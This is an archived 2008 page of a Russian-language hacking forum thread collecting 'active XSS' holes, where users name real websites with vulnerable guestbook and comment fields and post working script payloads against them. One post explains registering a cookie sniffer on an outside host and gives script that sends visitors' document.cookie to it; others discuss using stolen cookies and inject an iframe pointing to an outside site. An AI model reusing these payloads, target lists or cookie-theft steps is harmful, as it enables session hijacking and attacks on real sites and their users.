ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Активные Xss
   
 
Страница 14 из 41 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 20.01.2008, 03:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив

<script>alert(/отжиг/)</script>
зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой )
Последний раз редактировалось xcedz; 20.01.2008 в 16:17..
 

  #132  
Старый 22.01.2008, 04:17
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию
http://news.nag.ru/news/root/crnews/
Уязвимы комментарии.
Код:
http://news.nag.ru/news/root/crnews/story15827/
 

  #133  
Старый 22.01.2008, 12:40
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
Wink
Цитата:
Сообщение от Lamersha  
народ поскажите что я могу зделать с этой xss тоько в IE пашет?? http://helpdesk.flygroup.st/index.php?="><script>alert(5555)</script>


пробовала это захожу по ссылке() на снифер не чего не приходит в чем может быть проблема?
http://helpdesk.flygroup.st/index.php?="><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>

заранее спасибо
PHP код:
http://s.netsec.ru/ 
регистрируй там сниффер
PHP код:
http://s.netsec.ru/Твой_Логин.gif 
адрес твоего сниффера

PHP код:
<a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a
вызов по ссылке

PHP код:
<img src="http://s.netsec.ru/Твой_Логин.gif"
код HTML

PHP код:
<script>img = new Image(); img.src "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script
вызов из скрипта

GreenBear
Сниффер от netsec.ru
http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html
Последний раз редактировалось SSSetuPPP; 22.01.2008 в 21:55..
 

  #134  
Старый 29.01.2008, 22:41
•†•SyTiNeR•†•
Познающий
Регистрация: 01.01.2008
Сообщений: 91
Провел на форуме:
994508

Репутация: 143
Отправить сообщение для •†•SyTiNeR•†• с помощью ICQ
По умолчанию
Цитата:
Сообщение от MaSter GeN  
дико извеняюсь за офф топ достал куки каким образом их использовать если еcть инфа на анти чате дайте ссылочку пожалуйста
Вбей в браузер вроде в Опере есть в настройках куда куки ставлять
 

  #135  
Старый 30.01.2008, 15:36
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
www.shinovozoff.ru - онлайн магазин авто-товаров

http://www.shinovozoff.ru/guestbook/
уязвимы все поля ввода, результат =)
 

  #136  
Старый 03.02.2008, 05:31
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
www.jino-net.ru

у себя в контрольной панели в поле подсказка пароля пишешь:
Код:
<script>alert(document.cookie)</script>
Затем идёшь восстанавливать пароль:
www.jino-net.ru/lostpass.phtml?login=ЛОГИН
и выскакивает алерт с куками
 

  #137  
Старый 03.02.2008, 21:43
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
Код:
gamer.kraslan.ru
в поле комментов втыкаем

Код:
<iframe src= http://you-money.100webspace.net <
рабочая версия

Код:
http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791
Последний раз редактировалось MaSter GeN; 03.02.2008 в 22:04..
 

  #138  
Старый 06.02.2008, 22:34
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию
auto05.ru

Код:
http://www.auto05.ru/guestbook.html?page=1
Уязвимо поле комментариев.

redyarsk.ru
Код:
http://www.redyarsk.ru/gb/index.php?t=1&all=
Уязвимо поле комментариев.
Последний раз редактировалось Momiji; 06.02.2008 в 23:00..
 

  #139  
Старый 18.02.2008, 20:59
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
уууу блин
http://www.pressofatlanticcity.com

постим коммент к новости

Код:
<IMG """><SCRIPT>alert("master gen")</SCRIPT>">
получам
рабочий вариант !
http://www.pressofatlanticcity.com/188/story/84175.html
 

  #140  
Старый 22.02.2008, 11:55
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549

Репутация: 301
Отправить сообщение для N1K70 с помощью ICQ
Post
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303

в заголовке (Subjekti) пишите:

<script>alert(/n1k70/)</script>
 
 
Страница 14 из 41 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ